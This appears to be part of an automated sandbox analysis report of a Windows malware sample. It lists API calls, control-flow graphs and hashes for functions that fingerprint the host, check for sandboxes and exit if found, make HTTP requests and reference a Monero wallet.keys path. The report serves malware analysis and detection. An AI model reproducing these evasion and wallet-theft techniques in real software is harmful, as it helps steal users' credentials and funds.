                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess
                  • String ID: block
                  • API String ID: 621844428-2199623458
                  • Opcode ID: 01c444bed3f9e3bd6bd0d477a3fb3ad9e998a2942cbafbc8673e32ec711b3ca8
                  • Instruction ID: a5b1125386dd98f4040d46965dbe367940a25d0131b86b702b510ff8815efaad
                  • Opcode Fuzzy Hash: 01c444bed3f9e3bd6bd0d477a3fb3ad9e998a2942cbafbc8673e32ec711b3ca8
                  • Instruction Fuzzy Hash: 73515AB5A1420AFFDB05DFE0D954ABE77B5BF44309F104048E816AB360D770A985CB62
                  Function 00147500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1356 147500-14754a GetWindowsDirectoryA 1357 147553-1475c7 GetVolumeInformationA call 148d00 * 3 1356->1357 1358 14754c 1356->1358 1365 1475d8-1475df 1357->1365 1358->1357 1366 1475e1-1475fa call 148d00 1365->1366 1367 1475fc-147617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 147628-147658 wsprintfA call 14a740 1367->1369 1370 147619-147626 call 14a740 1367->1370 1377 14767e-14768e 1369->1377 1370->1377
                  APIs
                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00147542
                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0014757F
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00147603
                  • RtlAllocateHeap.NTDLL(00000000), ref: 0014760A
                  • wsprintfA.USER32 ref: 00147640
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                  • String ID: :$C$\
                  • API String ID: 1544550907-3809124531
                  • Opcode ID: 3345dee9a37a005a09312ce41762f284446d9d23b956a54e9095e2ec36581230
                  • Instruction ID: cd9f7b3ec661968bc594b0e54a5a017d50f35acfcd9a74d4fa6744aa2df7dba8
                  • Opcode Fuzzy Hash: 3345dee9a37a005a09312ce41762f284446d9d23b956a54e9095e2ec36581230
                  • Instruction Fuzzy Hash: A941B4B1D04248ABDF21DF94DC45BEEBBB8EF58704F100198F5096B2D0D7746A84CBA5
                  Function 001469F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00149860: GetProcAddress.KERNEL32(75900000,010206C0), ref: 001498A1
                    • Part of subcall function 00149860: GetProcAddress.KERNEL32(75900000,010205A0), ref: 001498BA
                    • Part of subcall function 00149860: GetProcAddress.KERNEL32(75900000,010205B8), ref: 001498D2
                    • Part of subcall function 00149860: GetProcAddress.KERNEL32(75900000,01020780), ref: 001498EA
                    • Part of subcall function 00149860: GetProcAddress.KERNEL32(75900000,01020678), ref: 00149903
                    • Part of subcall function 00149860: GetProcAddress.KERNEL32(75900000,01028AA0), ref: 0014991B
                    • Part of subcall function 00149860: GetProcAddress.KERNEL32(75900000,01016700), ref: 00149933
                    • Part of subcall function 00149860: GetProcAddress.KERNEL32(75900000,010167A0), ref: 0014994C
                    • Part of subcall function 00149860: GetProcAddress.KERNEL32(75900000,01020618), ref: 00149964
                    • Part of subcall function 00149860: GetProcAddress.KERNEL32(75900000,01020810), ref: 0014997C
                    • Part of subcall function 00149860: GetProcAddress.KERNEL32(75900000,01020720), ref: 00149995
                    • Part of subcall function 00149860: GetProcAddress.KERNEL32(75900000,010207B0), ref: 001499AD
                    • Part of subcall function 00149860: GetProcAddress.KERNEL32(75900000,01016A00), ref: 001499C5
                    • Part of subcall function 00149860: GetProcAddress.KERNEL32(75900000,01020648), ref: 001499DE
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                    • Part of subcall function 001311D0: ExitProcess.KERNEL32 ref: 00131211
                    • Part of subcall function 00131160: GetSystemInfo.KERNEL32(?), ref: 0013116A
                    • Part of subcall function 00131160: ExitProcess.KERNEL32 ref: 0013117E
                    • Part of subcall function 00131110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0013112B
                    • Part of subcall function 00131110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00131132
                    • Part of subcall function 00131110: ExitProcess.KERNEL32 ref: 00131143
                    • Part of subcall function 00131220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0013123E
                    • Part of subcall function 00131220: __aulldiv.LIBCMT ref: 00131258
                    • Part of subcall function 00131220: __aulldiv.LIBCMT ref: 00131266
                    • Part of subcall function 00131220: ExitProcess.KERNEL32 ref: 00131294
                    • Part of subcall function 00146770: GetUserDefaultLangID.KERNEL32 ref: 00146774
                    • Part of subcall function 00131190: ExitProcess.KERNEL32 ref: 001311C6
                    • Part of subcall function 00147850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001311B7), ref: 00147880
                    • Part of subcall function 00147850: RtlAllocateHeap.NTDLL(00000000), ref: 00147887
                    • Part of subcall function 00147850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0014789F
                    • Part of subcall function 001478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00147910
                    • Part of subcall function 001478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00147917
                    • Part of subcall function 001478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0014792F
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01028AB0,?,0015110C,?,00000000,?,00151110,?,00000000,00150AEF), ref: 00146ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00146AE8
                  • CloseHandle.KERNEL32(00000000), ref: 00146AF9
                  • Sleep.KERNEL32(00001770), ref: 00146B04
                  • CloseHandle.KERNEL32(?,00000000,?,01028AB0,?,0015110C,?,00000000,?,00151110,?,00000000,00150AEF), ref: 00146B1A
                  • ExitProcess.KERNEL32 ref: 00146B22
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                  • String ID:
                  • API String ID: 2525456742-0
                  • Opcode ID: 924970beb3fde328ef0db43d024ae1dec70ffa17e82845f4add861ac5e47e394
                  • Instruction ID: eedf169c9e37c08a77f2f884a2923f6c86615b9429353c7d9d380d18d4582322
                  • Opcode Fuzzy Hash: 924970beb3fde328ef0db43d024ae1dec70ffa17e82845f4add861ac5e47e394
                  • Instruction Fuzzy Hash: C7317F70980209ABEB05FBF0DC56BEE7738EF64305F914518F212A61A2DF706945C7A2
                  Function 00131220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1436 131220-131247 call 1489b0 GlobalMemoryStatusEx 1439 131273-13127a 1436->1439 1440 131249-131271 call 14da00 * 2 1436->1440 1442 131281-131285 1439->1442 1440->1442 1444 131287 1442->1444 1445 13129a-13129d 1442->1445 1447 131292-131294 ExitProcess 1444->1447 1448 131289-131290 1444->1448 1448->1445 1448->1447
                  APIs
                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0013123E
                  • __aulldiv.LIBCMT ref: 00131258
                  • __aulldiv.LIBCMT ref: 00131266
                  • ExitProcess.KERNEL32 ref: 00131294
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                  • String ID: @
                  • API String ID: 3404098578-2766056989
                  • Opcode ID: d5f28bee20ec76a8bf81e8c3114c8b4be6aeebb9e078244bd5e4758441143261
                  • Instruction ID: 159da9e26f6b097d5f34ff5b3c8fa7bc0dde5e4ec7bada6d48e903b5f9c6cc2e
                  • Opcode Fuzzy Hash: d5f28bee20ec76a8bf81e8c3114c8b4be6aeebb9e078244bd5e4758441143261
                  • Instruction Fuzzy Hash: 5F01FBB0944308BAEF10EBE4DC49BAEBB78AB54705F308048E705B6290D77455458799
                  Function 00146AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1450 146af3 1451 146b0a 1450->1451 1453 146b0c-146b22 call 146920 call 145b10 CloseHandle ExitProcess 1451->1453 1454 146aba-146ad7 call 14aad0 OpenEventA 1451->1454 1459 146af5-146b04 CloseHandle Sleep 1454->1459 1460 146ad9-146af1 call 14aad0 CreateEventA 1454->1460 1459->1451 1460->1453
                  APIs
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01028AB0,?,0015110C,?,00000000,?,00151110,?,00000000,00150AEF), ref: 00146ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00146AE8
                  • CloseHandle.KERNEL32(00000000), ref: 00146AF9
                  • Sleep.KERNEL32(00001770), ref: 00146B04
                  • CloseHandle.KERNEL32(?,00000000,?,01028AB0,?,0015110C,?,00000000,?,00151110,?,00000000,00150AEF), ref: 00146B1A
                  • ExitProcess.KERNEL32 ref: 00146B22
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                  • String ID:
                  • API String ID: 941982115-0
                  • Opcode ID: d588cc3e9e485dc862491a13995f6588da28fb7e9bbddd1bd662a8ad79a448bf
                  • Instruction ID: bf335989fe887f10200414d70a9279c06997341754fcfa97e6455813d38d11e4
                  • Opcode Fuzzy Hash: d588cc3e9e485dc862491a13995f6588da28fb7e9bbddd1bd662a8ad79a448bf
                  • Instruction Fuzzy Hash: BAF0E2B0A40609EFE715ABA0DC0ABBD7B38FF14705F204814F517E20E1CBB01581D697
                  Function 001347B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00134839
                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00134849
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CrackInternetlstrlen
                  • String ID: <
                  • API String ID: 1274457161-4251816714
                  • Opcode ID: c137ece1bae5970c6dfc8217cac1f0fae5de05da13df6ffcdc551f06fafe1cdb
                  • Instruction ID: e60f9d4e42df4dd3f6e8b485103808c377d9756f663ebe5c7b64d6a8da86f754
                  • Opcode Fuzzy Hash: c137ece1bae5970c6dfc8217cac1f0fae5de05da13df6ffcdc551f06fafe1cdb
                  • Instruction Fuzzy Hash: 3C213EB1D00209ABDF14DFA5EC45ADE7B79FF44320F108625F915A7291EB706A0ACB91
                  Function 001451F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 0014A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0014A7E6
                    • Part of subcall function 00136280: InternetOpenA.WININET(00150DFE,00000001,00000000,00000000,00000000), ref: 001362E1
                    • Part of subcall function 00136280: StrCmpCA.SHLWAPI(?,0102E470), ref: 00136303
                    • Part of subcall function 00136280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00136335
                    • Part of subcall function 00136280: HttpOpenRequestA.WININET(00000000,GET,?,0102DA58,00000000,00000000,00400100,00000000), ref: 00136385
                    • Part of subcall function 00136280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001363BF
                    • Part of subcall function 00136280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001363D1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00145228
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                  • String ID: ERROR$ERROR
                  • API String ID: 3287882509-2579291623
                  • Opcode ID: 3666c2d8fac42e2b510474dd4c4c716acbefc58c373ea49276d2a9f9075c0bdf
                  • Instruction ID: ef5bb97c61aa4656642841cd9d9f5f9fc1e250b1f275d7d3d2c3d60d3de69a92
                  • Opcode Fuzzy Hash: 3666c2d8fac42e2b510474dd4c4c716acbefc58c373ea49276d2a9f9075c0bdf
                  • Instruction Fuzzy Hash: 37113070944108FBEB14FF60DD52EED7739AF60301F914168F81A4B1A2EF30AB06CA92
                  Function 001478E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00147910
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00147917
                  • GetComputerNameA.KERNEL32(?,00000104), ref: 0014792F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateComputerNameProcess
                  • String ID:
                  • API String ID: 1664310425-0
                  • Opcode ID: 0fc1918864772c18df562c6f4ab8ab971a3bce09e182999ae730d2bd5449874d
                  • Instruction ID: cbc77bbf5ac5309b47c7f682b27a3aaf0bf1507d5c771812f5130460fbed1800
                  • Opcode Fuzzy Hash: 0fc1918864772c18df562c6f4ab8ab971a3bce09e182999ae730d2bd5449874d
                  • Instruction Fuzzy Hash: 7101D6B1A04604EBC714DF84DD45BAEBBBCF744B21F100219F905E3290C37459008BA2
                  Function 00131110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0013112B
                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 00131132
                  • ExitProcess.KERNEL32 ref: 00131143
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$AllocCurrentExitNumaVirtual
